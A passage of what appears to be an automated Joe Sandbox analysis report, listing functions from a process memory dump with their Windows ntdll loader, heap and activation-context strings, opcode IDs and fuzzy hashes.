                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-204845295
                                                                                                                • Opcode ID: bc279b9e7220cb5ac3888e7e4de892b88d98256adaa5ed1fcfcf8bfd493670fb
                                                                                                                • Instruction ID: fb88824b49cc1f49651b8dbefb44ae9a10b64df75972096766a31f6b85119f4b
                                                                                                                • Opcode Fuzzy Hash: bc279b9e7220cb5ac3888e7e4de892b88d98256adaa5ed1fcfcf8bfd493670fb
                                                                                                                • Instruction Fuzzy Hash: 3351D1716083419FEB25DF25D881FAB7BE4FB94648F12091FF6959B270D630E908CB92
                                                                                                                Function 014D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01512180
                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01512160, 0151219A, 015121BA
                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01512178
                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015121BF
                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01512165
                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0151219F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                • API String ID: 0-861424205
                                                                                                                • Opcode ID: c94525e7c91cd4f7d8c3bce0a03ebfba629181ce2694afdaa923edb23490b86a
                                                                                                                • Instruction ID: 4fb1bbc4033ed35ae0c98e949b5fe8e621c2303d81497987afee526a68e9205a
                                                                                                                • Opcode Fuzzy Hash: c94525e7c91cd4f7d8c3bce0a03ebfba629181ce2694afdaa923edb23490b86a
                                                                                                                • Instruction Fuzzy Hash: 14312B36F4022577FF22DA998C91F5F7B78EFA5A50F25005BFA04AB254D2B09E01C7A0
                                                                                                                Function 014DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01518177, 015181EB
                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01518170
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 014DC6C3
                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 015181E5
                                                                                                                • LdrpInitializeProcess, xrefs: 014DC6C4
                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01518181, 015181F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                • API String ID: 0-475462383
                                                                                                                • Opcode ID: 274f89d3c1957d903a2992abf2b9667e2f8ee90ec572dc0a37f2bb44ba6d049d
                                                                                                                • Instruction ID: 9228738d3101afce417556f91b59268f25e8e8451a19039278afafea292f2a8a
                                                                                                                • Opcode Fuzzy Hash: 274f89d3c1957d903a2992abf2b9667e2f8ee90ec572dc0a37f2bb44ba6d049d
                                                                                                                • Instruction Fuzzy Hash: A63102726443029BD221EF29D886E2E7BD5FFA4B20F05055DF945AB3A1E670EC04C7A2
                                                                                                                Function 014E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 014E2DF0: LdrInitializeThunk.NTDLL ref: 014E2DFA
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0BA3
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0BB6
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0D60
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0D74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 1404860816-0
                                                                                                                • Opcode ID: ff57d8ea7521b702f856450718e48339ac3212ec32795b853c19e4179856cd89
                                                                                                                • Instruction ID: 2579d7c9c1146aaa73cc8ec389d1dc4c546eeb65eb6f418142fbd2580a974467
                                                                                                                • Opcode Fuzzy Hash: ff57d8ea7521b702f856450718e48339ac3212ec32795b853c19e4179856cd89
                                                                                                                • Instruction Fuzzy Hash: 05428C71A00705DFEB21CF28C884BAAB7F5FF04315F0445AAE999DB255D7B0AA85CF60
                                                                                                                Function 014B29A0 Relevance: 6.0, Strings: 4, Instructions: 966COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                • API String ID: 0-3126994380
                                                                                                                • Opcode ID: c41acb849a0c6ca7dd0244ee542d6ed49d7c69398a19a49362803f12134c2d32
                                                                                                                • Instruction ID: cdabc629ceebb15963003810b79267ddfac4fd6aca8a97a7e5430adcab96591d
                                                                                                                • Opcode Fuzzy Hash: c41acb849a0c6ca7dd0244ee542d6ed49d7c69398a19a49362803f12134c2d32
                                                                                                                • Instruction Fuzzy Hash: 3492BC71A042499FDB25CF69C484BEEBBF1FF48310F18805AE859AB361D774A946CF60
                                                                                                                Function 014AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                • API String ID: 0-379654539
                                                                                                                • Opcode ID: 4ce6dd16af418cea8afe4a4bac20bf67d60b5de50501dbec6a4e8902ca4e8ce0
                                                                                                                • Instruction ID: 7f0be1b4b92a90b592f0330b88f8431a744625f078c8b1eb5fa1ab9836319c5b
                                                                                                                • Opcode Fuzzy Hash: 4ce6dd16af418cea8afe4a4bac20bf67d60b5de50501dbec6a4e8902ca4e8ce0
                                                                                                                • Instruction Fuzzy Hash: FAC1BC75108382CFD722CF58C144B6ABBE4BFA8704F55486EF9958B3A1E334C94ACB56
                                                                                                                Function 014D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • @, xrefs: 014D8591
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 014D8421
                                                                                                                • LdrpInitializeProcess, xrefs: 014D8422
                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 014D855E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-1918872054
                                                                                                                • Opcode ID: 2cb1fd4f6aaa7d84905f9f60aceb747eb0b491584bc44df087ed5028b822acd8
                                                                                                                • Instruction ID: 2b67b448bb2b38f1f945dfc011c8a64de85c20bfb3ac30b7d7268b10dafa0d7a
                                                                                                                • Opcode Fuzzy Hash: 2cb1fd4f6aaa7d84905f9f60aceb747eb0b491584bc44df087ed5028b822acd8
                                                                                                                • Instruction Fuzzy Hash: 3A918071558346AFEB22DF65CC60EBBBAECBF94644F40092FF68496161E370D904CB62
                                                                                                                Function 014D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015122B6
                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015121D9, 015122B1
                                                                                                                • .Local, xrefs: 014D28D8
                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 015121DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                • API String ID: 0-1239276146
                                                                                                                • Opcode ID: 58b37e3a82a8cdff978bda824cf96ae3a67624fd98beea848e42dfbfd1609056
                                                                                                                • Instruction ID: 9151c14b7fbd055d895cc0b840324a8f4bd675cb78cc9b0ed65e80f574d265cf
                                                                                                                • Opcode Fuzzy Hash: 58b37e3a82a8cdff978bda824cf96ae3a67624fd98beea848e42dfbfd1609056
                                                                                                                • Instruction Fuzzy Hash: 72A1D131A00229DBDF21CF59CC94BAAB7B1BF58314F2541EAD918AB361D7709E81CF90
                                                                                                                Function 014D4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0151342A
                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01513437
                                                                                                                • RtlDeactivateActivationContext, xrefs: 01513425, 01513432, 01513451
                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01513456
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                • API String ID: 0-1245972979
                                                                                                                • Opcode ID: 8fb0178a6c2a60aaf06f8dc859f2a70125e4b4ae4b24045cce032e86c96aeaca
                                                                                                                • Instruction ID: 43e3b09b2174c970767b8f87aa9aa3a3d21e30cf68013b4de24a46c10293e635
                                                                                                                • Opcode Fuzzy Hash: 8fb0178a6c2a60aaf06f8dc859f2a70125e4b4ae4b24045cce032e86c96aeaca
                                                                                                                • Instruction Fuzzy Hash: 8A6147326407129BEB23CF1DC8A5B2AB7E0BF90B20F19851EE9559F764D770E801CB91
                                                                                                                Function 014A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0150106B
                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015010AE
                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01500FE5
                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01501028
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                • API String ID: 0-1468400865
                                                                                                                • Opcode ID: a1e947ff5af66960216a9da0ef9f0173511143a15d4264c466344d9dd1dd3967
                                                                                                                • Instruction ID: 56f85ae11095662588863e658f7c6fc1b04c91ab0a80567378a69c45cbe8fec8
                                                                                                                • Opcode Fuzzy Hash: a1e947ff5af66960216a9da0ef9f0173511143a15d4264c466344d9dd1dd3967
                                                                                                                • Instruction Fuzzy Hash: D97124B19043059FCB21DF15C884F9B7FA8AF65754F86046EF9888B2A6D334D588CBD2
                                                                                                                Function 014C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0150A9A2
                                                                                                                • apphelp.dll, xrefs: 014C2462
                                                                                                                • LdrpDynamicShimModule, xrefs: 0150A998
                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0150A992
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-176724104
                                                                                                                • Opcode ID: 4d5c5c35e3d67c4bf03c7834dd1074b21b02f6f4c75b606109b2ca7be95d3ed4
                                                                                                                • Instruction ID: ed869b2f05aba2cfd9be9d7b38350e577fb41a403b4ca72ed3b48ee5ce18dd12
                                                                                                                • Opcode Fuzzy Hash: 4d5c5c35e3d67c4bf03c7834dd1074b21b02f6f4c75b606109b2ca7be95d3ed4
                                                                                                                • Instruction Fuzzy Hash: AD312875600302EBDB329FA99985E6EB7B4FB80B04F17001EE9206F2A5C7F05986D781
                                                                                                                Function 014B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                • API String ID: 0-4253913091
                                                                                                                • Opcode ID: 6da8d70f468ae612e2e72fe164fe259b317306c24a9411ba9c8eb218a470a0cb
                                                                                                                • Instruction ID: 337d178db3e2d2552e7f9632a6315ba5207139f79e477beccb7e1452df20d18a
                                                                                                                • Opcode Fuzzy Hash: 6da8d70f468ae612e2e72fe164fe259b317306c24a9411ba9c8eb218a470a0cb
                                                                                                                • Instruction Fuzzy Hash: D5F19E30600606DFEB26CFA8C894BAAB7F5FF44305F14416AE5569B3A1D734E981CFA1
                                                                                                                Function 014C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $@
                                                                                                                • API String ID: 0-1077428164
                                                                                                                • Opcode ID: 1dafc3caac26f121ce2d26d8d97d181dd75dcb4e9b488141cac1f911556a6808
                                                                                                                • Instruction ID: 597718af811d654a41b57a79cc22f7bbd23c0afa931ae92818784b816ba82299
                                                                                                                • Opcode Fuzzy Hash: 1dafc3caac26f121ce2d26d8d97d181dd75dcb4e9b488141cac1f911556a6808
                                                                                                                • Instruction Fuzzy Hash: B8C2C0756083418FE765CF69C880BABBBE5BF89B14F04892EE989C7361D734D805CB52
                                                                                                                Function 0149A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                • API String ID: 0-2779062949
                                                                                                                • Opcode ID: 2fd31d8047dc6a958c935518db22b1016ebd0019ef0e5cba4a4094af7f51ad05
                                                                                                                • Instruction ID: 410d3389f268429538757ece49011f3e72642b078cd6cad245e0e0588962c295
                                                                                                                • Opcode Fuzzy Hash: 2fd31d8047dc6a958c935518db22b1016ebd0019ef0e5cba4a4094af7f51ad05
                                                                                                                • Instruction Fuzzy Hash: 9BA158759012299BDF319F28CC88BEAB7B8EF54714F1001EAEA08A7260D7759E85CF50
                                                                                                                Function 014C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 0150A10F
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0150A121
                                                                                                                • LdrpCheckModule, xrefs: 0150A117
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-161242083
                                                                                                                • Opcode ID: 7bf05317f01d21ed0855c937cf19708da827854eb80af6eb4582ac61111218f9
                                                                                                                • Instruction ID: b9d27f0800a81b908dd5bf31c795c656815e23240a262fe426d5a1f0b1ca83f5
                                                                                                                • Opcode Fuzzy Hash: 7bf05317f01d21ed0855c937cf19708da827854eb80af6eb4582ac61111218f9
                                                                                                                • Instruction Fuzzy Hash: 2D71E478A00306DFDB29DFA9C980ABEB7F4FB54604F16402EE4119B365E734A946CB51
                                                                                                                Function 014B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                • API String ID: 0-1334570610
                                                                                                                • Opcode ID: 67d2e7e9cd6202c91c8c7814821f5f868881fecb0978382811ccc7c49038fba4
                                                                                                                • Instruction ID: cd9f2aa3dd9c657088b2730e7ca8d7049ebcae7aba3dc7115ae4761f0d34445b
                                                                                                                • Opcode Fuzzy Hash: 67d2e7e9cd6202c91c8c7814821f5f868881fecb0978382811ccc7c49038fba4
                                                                                                                • Instruction Fuzzy Hash: EC61AF716143029FDB29CF68C480BABBBF1FF54705F14855AE8598F2A2D770E881CBA1
                                                                                                                Function 014DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 015182DE
                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 015182D7
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 015182E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-1783798831
                                                                                                                • Opcode ID: 218b4ca15d4283b55886722d44bb59b34df61ce430809c703a2263a74977aed2
                                                                                                                • Instruction ID: b765fdcda846698d722dc4ae36844128dc9b121facd579c81369ab21702beaa5
                                                                                                                • Opcode Fuzzy Hash: 218b4ca15d4283b55886722d44bb59b34df61ce430809c703a2263a74977aed2
                                                                                                                • Instruction Fuzzy Hash: A641F3B1540302ABDB31EB69D884F9B77E8BF58650F06482FF9549B2A4E770D804CB92
                                                                                                                Function 0155C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0155C1C5
                                                                                                                • PreferredUILanguages, xrefs: 0155C212
                                                                                                                • @, xrefs: 0155C1F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                • API String ID: 0-2968386058
                                                                                                                • Opcode ID: c51ca750496cb680389543e0ee9892e06af0ebcc5f586e93e3c5e2062e92c1b4
                                                                                                                • Instruction ID: 96d1707c5ada8ed86c07b50bec7bb14fb41ca7a55402e332e5ea10814788dbb3
                                                                                                                • Opcode Fuzzy Hash: c51ca750496cb680389543e0ee9892e06af0ebcc5f586e93e3c5e2062e92c1b4
                                                                                                                • Instruction Fuzzy Hash: 0B418071E00209ABDF51DED9C891BEEBBBCBB24744F14406BEA49BB250D7749A448B90
                                                                                                                Function 01534144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                • API String ID: 0-1373925480
                                                                                                                • Opcode ID: 1954b68c671dd3e4d2a1a8c646823909ccec4a79cb2d6be004107cb384dc86a2
                                                                                                                • Instruction ID: 00b9573fabda9cad246ead555d2764ea0899af028780a41a2645d2efec087e5a
                                                                                                                • Opcode Fuzzy Hash: 1954b68c671dd3e4d2a1a8c646823909ccec4a79cb2d6be004107cb384dc86a2
                                                                                                                • Instruction Fuzzy Hash: 1C41D232A006598BEB25DF9AC844BADBBF8FFA5340F14085AE901FF791D7748901CB60
                                                                                                                Function 01524755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01524888
                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01524899
                                                                                                                • LdrpCheckRedirection, xrefs: 0152488F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                • API String ID: 0-3154609507
                                                                                                                • Opcode ID: a0464f78adfc087929363bd4354ac45333bfa29a2d7017c24284f8d0d71d5137
                                                                                                                • Instruction ID: 6a869259a05dc1b62e04aacb8d5a8eeb98cfb14146c51e86eb127297e76d3b90
                                                                                                                • Opcode Fuzzy Hash: a0464f78adfc087929363bd4354ac45333bfa29a2d7017c24284f8d0d71d5137
                                                                                                                • Instruction Fuzzy Hash: 8741A133A146719FCB21CF68D840A6A7BE4BF8AA50F0A056DED68DF391D770D801CB91
                                                                                                                Function 014B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                • API String ID: 0-2558761708
                                                                                                                • Opcode ID: 182b2016ba6e1d331bb8b1395a6692a41267470f5cb4571794b0ed76c61e9c7a
                                                                                                                • Instruction ID: 88f46abb39f641ea9a068514d303cd18aba8eacd51ce04aee8887ddef4623fd7
                                                                                                                • Opcode Fuzzy Hash: 182b2016ba6e1d331bb8b1395a6692a41267470f5cb4571794b0ed76c61e9c7a
                                                                                                                • Instruction Fuzzy Hash: BF11C3313281029FDB2ACB59C484BBAB7A4FF40616F1A855EF4058F2A1E730D845CB61
                                                                                                                Function 015220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 015220F3
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01522104
                                                                                                                • LdrpInitializationFailure, xrefs: 015220FA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
